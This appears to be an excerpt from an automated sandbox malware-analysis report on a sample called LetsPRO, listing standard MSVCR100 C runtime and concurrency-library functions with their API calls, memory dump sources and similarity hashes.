                                          • Part of subcall function 6C942477: ?GetPolicyValue@SchedulerPolicy@Concurrency@@QBEIW4PolicyElementKey@2@@Z.MSVCR100(00000005,00000003,00000002,00000001,?,00000000,00000000), ref: 6C942531
                                          • Part of subcall function 6C942477: ?GetPolicyValue@SchedulerPolicy@Concurrency@@QBEIW4PolicyElementKey@2@@Z.MSVCR100(00000006,00000005,00000003,00000002,00000001,?,00000000,00000000), ref: 6C942540
                                          • Part of subcall function 6C942477: ?GetPolicyValue@SchedulerPolicy@Concurrency@@QBEIW4PolicyElementKey@2@@Z.MSVCR100(00000008,00000006,00000005,00000003,00000002,00000001,?,00000000,00000000), ref: 6C94254F
                                          • Part of subcall function 6C942477: GetCurrentThread.KERNEL32 ref: 6C94256D
                                          • Part of subcall function 6C942477: GetThreadPriority.KERNEL32(00000000), ref: 6C942574
                                          • Part of subcall function 6C93F157: __EH_prolog3.LIBCMT ref: 6C93F15E
                                          • Part of subcall function 6C93F157: EnterCriticalSection.KERNEL32(6C93D835,00000008,6C948F12), ref: 6C93F170
                                          • Part of subcall function 6C93F157: ??2@YAPAXI@Z.MSVCR100(00000024), ref: 6C93F182
                                          • Part of subcall function 6C93F157: ??2@YAPAXI@Z.MSVCR100(00000030), ref: 6C93F1A7
                                          • Part of subcall function 6C93F157: LeaveCriticalSection.KERNEL32(?), ref: 6C93F1C9
                                        • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 6C948F16
                                        • GetLastError.KERNEL32 ref: 6C948F26
                                        • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(00000000), ref: 6C948F3E
                                        • _CxxThrowException.MSVCR100(?,6C9A0D48,00000000), ref: 6C948F4C
                                        • GetLastError.KERNEL32 ref: 6C948F69
                                        • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(00000000), ref: 6C948F81
                                        • GetLastError.KERNEL32 ref: 6C948FAB
                                        • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(00000000), ref: 6C948FC3
                                        • InitializeSListHead.KERNEL32(000000E8), ref: 6C948FDC
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: Policy$Concurrency@@ElementKey@2@@Policy@SchedulerValue@$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCriticalErrorH_prolog3LastSection$??2@InitializeThread$CountCreateCurrentEnterEventExceptionHeadLeaveListPrioritySpinThrow
                                        • String ID:
                                        • API String ID: 7361241-0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • __EH_prolog3_catch.LIBCMT ref: 6C941F3E
                                        • ??2@YAPAXI@Z.MSVCR100(00000024,0000003C,6C941F32,?,?,?,?,?,6C940452,?,00000000,6C9A55E0,0000000C,6C9403B2,?,?), ref: 6C941F47
                                          • Part of subcall function 6C90235B: malloc.MSVCR100(?), ref: 6C902366
                                        • memcpy.MSVCR100(00000000,6C9A7310,00000024,0000003C,6C941F32,?,?,?,?,?,6C940452,?,00000000,6C9A55E0,0000000C,6C9403B2), ref: 6C941F64
                                        • std::exception::exception.LIBCMT(?,?,6C9A0EC8,?,00000002,00000001), ref: 6C941F97
                                        • _CxxThrowException.MSVCR100(?,6C9A0EC8,?,00000002,00000001), ref: 6C941FAC
                                        • std::exception::exception.LIBCMT(?,6C933AC0,6C9A0EAC,?), ref: 6C941FCB
                                        • ?GetPolicyValue@SchedulerPolicy@Concurrency@@QBEIW4PolicyElementKey@2@@Z.MSVCR100(00000001), ref: 6C941FEE
                                        • ?GetPolicyValue@SchedulerPolicy@Concurrency@@QBEIW4PolicyElementKey@2@@Z.MSVCR100(00000002,00000001), ref: 6C941FF9
                                        • Concurrency::unsupported_os::unsupported_os.LIBCMT(00000002,00000001), ref: 6C94200F
                                        • Concurrency::unsupported_os::unsupported_os.LIBCMT(?,00000002,00000001), ref: 6C94202B
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: Policy$Concurrency::unsupported_os::unsupported_osConcurrency@@ElementKey@2@@Policy@SchedulerValue@std::exception::exception$??2@ExceptionH_prolog3_catchThrowmallocmemcpy
                                        • String ID:
                                        • API String ID: 1209366282-0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • _errno.MSVCR100(?,?,?,?,6C917F14,?,?,?,?,00000000,?), ref: 6C917F4C
                                        • _errno.MSVCR100(?,6C917F14,?,?,?,?,00000000,?), ref: 6C92944C
                                        • _invalid_parameter_noinfo.MSVCR100(?,6C917F14,?,?,?,?,00000000,?), ref: 6C929457
                                        • _errno.MSVCR100(?,?,?,?,6C917F14,?,?,?,?,00000000,?), ref: 6C929475
                                        • _errno.MSVCR100 ref: 6C929482
                                        • _errno.MSVCR100 ref: 6C92948C
                                        • _errno.MSVCR100 ref: 6C9294BC
                                        • _errno.MSVCR100 ref: 6C9294C6
                                        • _errno.MSVCR100 ref: 6C9294D9
                                        • _invalid_parameter_noinfo.MSVCR100(?,?,?,?,6C917F14,?,?,?,?,00000000,?), ref: 6C9294E4
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: _errno$_invalid_parameter_noinfo
                                        • String ID:
                                        • API String ID: 2819658684-0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • _lock.MSVCR100(00000007,6C910D28,0000000C), ref: 6C910CC5
                                          • Part of subcall function 6C900940: EnterCriticalSection.KERNEL32(00000001,00000001,?,6C901F15,0000000D), ref: 6C90095B
                                        • _wcslen.LIBCMT(00000000,6C910D28,0000000C), ref: 6C910D45
                                        • calloc.MSVCR100(00000001,00000002,00000000,6C910D28,0000000C), ref: 6C910D50
                                        • wcscpy_s.MSVCR100(00000000,00000001,00000000), ref: 6C910D67
                                        • _errno.MSVCR100(6C910D28,0000000C), ref: 6C93092F
                                        • _invalid_parameter_noinfo.MSVCR100(6C910D28,0000000C), ref: 6C930939
                                        • _errno.MSVCR100 ref: 6C93094A
                                        • _errno.MSVCR100 ref: 6C930955
                                          • Part of subcall function 6C910C46: _wcslen.LIBCMT(00000000,?,00000000,?,6C910D07,?,6C910D28,0000000C), ref: 6C910C68
                                          • Part of subcall function 6C910C46: _wcslen.LIBCMT(00000000,?,00000000,?,6C910D07,?,6C910D28,0000000C), ref: 6C910C7B
                                          • Part of subcall function 6C910C46: _wcsnicoll.MSVCR100(00000000,00000000,00000000,?,00000000,?,6C910D07,?,6C910D28,0000000C), ref: 6C910C98
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: _errno_wcslen$CriticalEnterSection_invalid_parameter_noinfo_lock_wcsnicollcallocwcscpy_s
                                        • String ID:
                                        • API String ID: 2000213683-0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • _lock.MSVCR100(00000008,6C917AA8,00000018,6C94BFB7,00000001,00000001,00000000,?,6C94BFE8,000000FF,?,6C927547,00000011,00000001,?,6C901F15), ref: 6C9179FA
                                        • DecodePointer.KERNEL32(6C917AA8,00000018,6C94BFB7,00000001,00000001,00000000,?,6C94BFE8,000000FF,?,6C927547,00000011,00000001,?,6C901F15,0000000D), ref: 6C917A34
                                        • DecodePointer.KERNEL32(?,6C94BFE8,000000FF,?,6C927547,00000011,00000001,?,6C901F15,0000000D), ref: 6C917A49
                                        • _encoded_null.MSVCR100(?,6C94BFE8,000000FF,?,6C927547,00000011,00000001,?,6C901F15,0000000D), ref: 6C917A60
                                        • DecodePointer.KERNEL32(-00000004,?,6C94BFE8,000000FF,?,6C927547,00000011,00000001,?,6C901F15,0000000D), ref: 6C917A6F
                                        • _encoded_null.MSVCR100(?,6C94BFE8,000000FF,?,6C927547,00000011,00000001,?,6C901F15,0000000D), ref: 6C917A73
                                        • DecodePointer.KERNEL32(?,6C94BFE8,000000FF,?,6C927547,00000011,00000001,?,6C901F15,0000000D), ref: 6C917A82
                                        • DecodePointer.KERNEL32(?,6C94BFE8,000000FF,?,6C927547,00000011,00000001,?,6C901F15,0000000D), ref: 6C917A8C
                                          • Part of subcall function 6C91792C: GetModuleHandleW.KERNEL32(00000000,6C9179F0,6C917AA8,00000018,6C94BFB7,00000001,00000001,00000000,?,6C94BFE8,000000FF,?,6C927547,00000011,00000001), ref: 6C91792E
                                        • ___crtCorExitProcess.LIBCMT ref: 6C927445
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: DecodePointer$_encoded_null$ExitHandleModuleProcess___crt_lock
                                        • String ID:
                                        • API String ID: 729311798-0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • GetModuleHandleA.KERNEL32(00000000), ref: 6C94AADB
                                        • GetModuleFileNameW.KERNEL32(6C8F0000,?,00000104), ref: 6C94AAF7
                                        • LoadLibraryW.KERNEL32(?), ref: 6C94AB08
                                        • GetLastError.KERNEL32 ref: 6C94AB1F
                                        • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(00000000), ref: 6C94AB3A
                                        • _CxxThrowException.MSVCR100(?,6C9A0D48,00000000), ref: 6C94AB4B
                                        • CreateThread.KERNEL32(00000000,-00000018,6C940F33,00010000,6C940F21,?), ref: 6C94AB8D
                                        • GetLastError.KERNEL32 ref: 6C94AB97
                                        • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(00000000), ref: 6C94ABAF
                                        • _CxxThrowException.MSVCR100(?,6C9A0D48,00000000), ref: 6C94ABBD
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorExceptionLastModuleThrow$CreateFileHandleLibraryLoadNameThread
                                        • String ID:
                                        • API String ID: 475412-0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • _errno.MSVCR100 ref: 6C97C482
                                        • _invalid_parameter_noinfo.MSVCR100 ref: 6C97C48C
                                          • Part of subcall function 6C97B066: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6C94B73F,?,6C94C2BB,00000003,6C9274E4,6C90A988,0000000C,6C927537,00000001,00000001), ref: 6C97B06D
                                        • _wcslen.LIBCMT(?), ref: 6C97C4AF
                                        • wcscpy_s.MSVCR100(?,?,?), ref: 6C97C4BF
                                        • wcscat_s.MSVCR100(?,?,6C933260), ref: 6C97C4D2
                                        • __invoke_watson.LIBCMT(00000000,00000000,00000000,00000000,00000000), ref: 6C97C4E5
                                        • _errno.MSVCR100 ref: 6C97C4EA
                                        • _wcslen.LIBCMT(?,00000000), ref: 6C97C4F2
                                        • _wcslen.LIBCMT(?,?,00000000), ref: 6C97C4FC
                                        • _wcserror_s.MSVCR100(00000000,?,00000000), ref: 6C97C506
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: _wcslen$_errno$__invoke_watson_invalid_parameter_invalid_parameter_noinfo_wcserror_swcscat_swcscpy_s
                                        • String ID:
                                        • API String ID: 998693625-0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • HeapReAlloc.KERNEL32(00000000,00000000,00000001,00000000,00000000,?,6C9047D9,?,00000001,00000000,00000000,?,6C930686,00000000,00000010), ref: 6C904741
                                        • malloc.MSVCR100(00000001,?,6C9047D9,?,00000001,00000000,00000000,?,6C930686,00000000,00000010), ref: 6C9047BD
                                        • free.MSVCR100(00000000,00000000,?,6C9047D9,?,00000001,00000000,00000000,?,6C930686,00000000,00000010), ref: 6C92F3AF
                                        • _callnewh.MSVCR100(00000001,?,6C9047D9,?,00000001,00000000,00000000,?,6C930686,00000000,00000010), ref: 6C92F3CB
                                        • _callnewh.MSVCR100(00000001,00000000,00000000,?,6C9047D9,?,00000001,00000000,00000000,?,6C930686,00000000,00000010), ref: 6C92F3DC
                                        • _errno.MSVCR100(00000000,00000000,?,6C9047D9,?,00000001,00000000,00000000,?,6C930686,00000000,00000010), ref: 6C92F3E2
                                        • _errno.MSVCR100(?,6C9047D9,?,00000001,00000000,00000000,?,6C930686,00000000,00000010,?,?,?,?,?,6C90AA43), ref: 6C92F3F4
                                        • GetLastError.KERNEL32(?,6C9047D9,?,00000001,00000000,00000000,?,6C930686,00000000,00000010,?,?,?,?,?,6C90AA43), ref: 6C92F3FB
                                        • _errno.MSVCR100(?,6C9047D9,?,00000001,00000000,00000000,?,6C930686,00000000,00000010,?,?,?,?,?,6C90AA43), ref: 6C92F40C
                                        • GetLastError.KERNEL32(?,6C9047D9,?,00000001,00000000,00000000,?,6C930686,00000000,00000010,?,?,?,?,?,6C90AA43), ref: 6C92F413
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: _errno$ErrorLast_callnewh$AllocHeapfreemalloc
                                        • String ID:
                                        • API String ID: 2627451454-0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • _errno.MSVCR100 ref: 6C94C681
                                        • _invalid_parameter_noinfo.MSVCR100 ref: 6C94C68C
                                          • Part of subcall function 6C97B066: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6C94B73F,?,6C94C2BB,00000003,6C9274E4,6C90A988,0000000C,6C927537,00000001,00000001), ref: 6C97B06D
                                        • __set_flsgetvalue.MSVCR100 ref: 6C94C696
                                        • _calloc_crt.MSVCR100(00000001,00000214), ref: 6C94C6A2
                                        • _getptd.MSVCR100 ref: 6C94C6AF
                                        • _initptd.MSVCR100(00000000,?), ref: 6C94C6B8
                                        • CreateThread.KERNEL32(?,?,6C94C60C,00000000,?,?), ref: 6C94C6E6
                                        • GetLastError.KERNEL32 ref: 6C94C6F0
                                        • free.MSVCR100(00000000), ref: 6C94C6F9
                                        • __dosmaperr.LIBCMT(00000000), ref: 6C94C704
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: CreateErrorLastThread__dosmaperr__set_flsgetvalue_calloc_crt_errno_getptd_initptd_invalid_parameter_invalid_parameter_noinfofree
                                        • String ID:
                                        • API String ID: 2355482382-0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: __aulldvrm__forcdecpt_l_errno_get_printf_count_output_strlen
                                        • String ID: @$@$g
                                        • API String ID: 3086443751-3810856864
                                        • Opcode ID: d8d8428d5d96500e785b8c9b81f9f77a8dba9e7f84154bda3cb54d0db6bae928
                                        • Instruction ID: 5458702a2d56b0787995d38b9256f6c6728581ffd1c727dcbdc30d3b5742e828
                                        • Opcode Fuzzy Hash: d8d8428d5d96500e785b8c9b81f9f77a8dba9e7f84154bda3cb54d0db6bae928
                                        • Instruction Fuzzy Hash: E0A159F1A056688EDB608F24CC84B98B7B8BB55318F1442EDD648B7A41E731DAC5CF68
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • DName::operator=.LIBCMT ref: 6C911624
                                        • atol.MSVCR100(?,?,00000010,00000000,00000000,00000000), ref: 6C92D6BB
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: Name::operator=atol
                                        • String ID: `template-parameter$void
                                        • API String ID: 1388095176-4057429177
                                        • Opcode ID: 27ad1f9e2dc986e8a421078dd706ba4503c5f20b9e539ce581655207431576bc
                                        • Instruction ID: 3fbd6e318698c9cf3fb8d533bf5eb58cd4024dbfd3aea7151327e20ebc91be07
                                        • Opcode Fuzzy Hash: 27ad1f9e2dc986e8a421078dd706ba4503c5f20b9e539ce581655207431576bc
                                        • Instruction Fuzzy Hash: CB511672B052089FCB00DFE8D8909EDBBB9AF19704F60402EE555A7B40E735DA49CB54
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • _memset.LIBCMT(?,000000FF,00000024,?,?,6C916A58,?), ref: 6C916A7D
                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C916AB8
                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C916B75
                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C916BCE
                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C916BEB
                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C916C0E
                                        • _errno.MSVCR100(?,?,6C916A58,?), ref: 6C929D82
                                        • _invalid_parameter_noinfo.MSVCR100(?,?,6C916A58,?), ref: 6C929D8C
                                        • _errno.MSVCR100(?,?,?,?,6C916A58,?), ref: 6C929DA6
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$_errno$_invalid_parameter_noinfo_memset
                                        • String ID:
                                        • API String ID: 1299486453-0
                                        • Opcode ID: 34dde7080fd8fe797ca347a62963af7269bc454f958ba71e527c9920dcfb0d5c
                                        • Instruction ID: 93aa09c6a239e8824b9de87f51d235cd2595bfb67b9e1b33b06d1e99c505489b
                                        • Opcode Fuzzy Hash: 34dde7080fd8fe797ca347a62963af7269bc454f958ba71e527c9920dcfb0d5c
                                        • Instruction Fuzzy Hash: 11612572F48209AFD7149F68CC41BAE77BAEF94318F15822DF550DBA81D779DA008B40
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: _fileno
                                        • String ID:
                                        • API String ID: 467780811-0
                                        • Opcode ID: a7f59fa0dbaa72c00ec1e594a6b1cfa30c225ec6a3cb2c2f8618f15bde116d7e
                                        • Instruction ID: 89f609a203c4b7855aa2cc860fcaf0ce6046f611a39670c53132ad1a18af7a6b
                                        • Opcode Fuzzy Hash: a7f59fa0dbaa72c00ec1e594a6b1cfa30c225ec6a3cb2c2f8618f15bde116d7e
                                        • Instruction Fuzzy Hash: C7510372615705CFC7208F29D844BAEB7E4AF22328B258A2DD4B5C7E91D734E645CF81
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • memcpy_s.MSVCR100(?,?,?,?), ref: 6C912B43
                                        • _errno.MSVCR100 ref: 6C928C79
                                        • _invalid_parameter_noinfo.MSVCR100 ref: 6C928C84
                                        • _memset.LIBCMT(?,00000000,?), ref: 6C928C97
                                        • _fileno.MSVCR100(?,?,?), ref: 6C928CF3
                                        • _read.MSVCR100(00000000,?,?), ref: 6C928CFA
                                        • _memset.LIBCMT(?,00000000,000000FF), ref: 6C928D24
                                        • _errno.MSVCR100 ref: 6C928D2C
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: _errno_memset$_fileno_invalid_parameter_noinfo_readmemcpy_s
                                        • String ID:
                                        • API String ID: 4008029522-0
                                        • Opcode ID: 5987f002416abeaa5bc7689c42fa05087acba37f528f16df8cd3b1623ce58768
                                        • Instruction ID: 9a0e8c4cff9fb7ff0e22d9c66ce5a0b1b9b3ea466a0b21c0014594459aacaa1e
                                        • Opcode Fuzzy Hash: 5987f002416abeaa5bc7689c42fa05087acba37f528f16df8cd3b1623ce58768
                                        • Instruction Fuzzy Hash: 99514631A06B0DDFCB14DF79884929E77B8BF52328F20862AE86457EC4D734DA45CB50
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • _fileno.MSVCR100(6C9108DE,?,?,?,6C9108DE,00000040,?), ref: 6C90ED07
                                        • _write.MSVCR100(6C9108DE,FFFF9BAB,00000000,00000000,6C9A45D0,?,?,?,6C9108DE,00000040,?), ref: 6C90ED75
                                        • __p__iob.MSVCR100(6C9A45D0,?,?,?,6C9108DE,00000040,?), ref: 6C912739
                                        • __p__iob.MSVCR100(6C9A45D0,?,?,?,6C9108DE,00000040,?), ref: 6C912749
                                        • _errno.MSVCR100(?,?,?,6C9108DE,00000040,?), ref: 6C92891D
                                        • _errno.MSVCR100(?,?,?,6C9108DE,00000040,?), ref: 6C928934
                                        • _isatty.MSVCR100(6C9108DE,6C9A45D0,?,?,?,6C9108DE,00000040,?), ref: 6C92895B
                                        • __lseeki64.LIBCMT(6C9108DE,00000000,00000000,00000002,00000000,6C9A45D0,?,?,?,6C9108DE,00000040,?), ref: 6C928978
                                        • _write.MSVCR100(6C9108DE,00000040,00000001,00000000,6C9A45D0,?,?,?,6C9108DE,00000040,?), ref: 6C928998
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmp
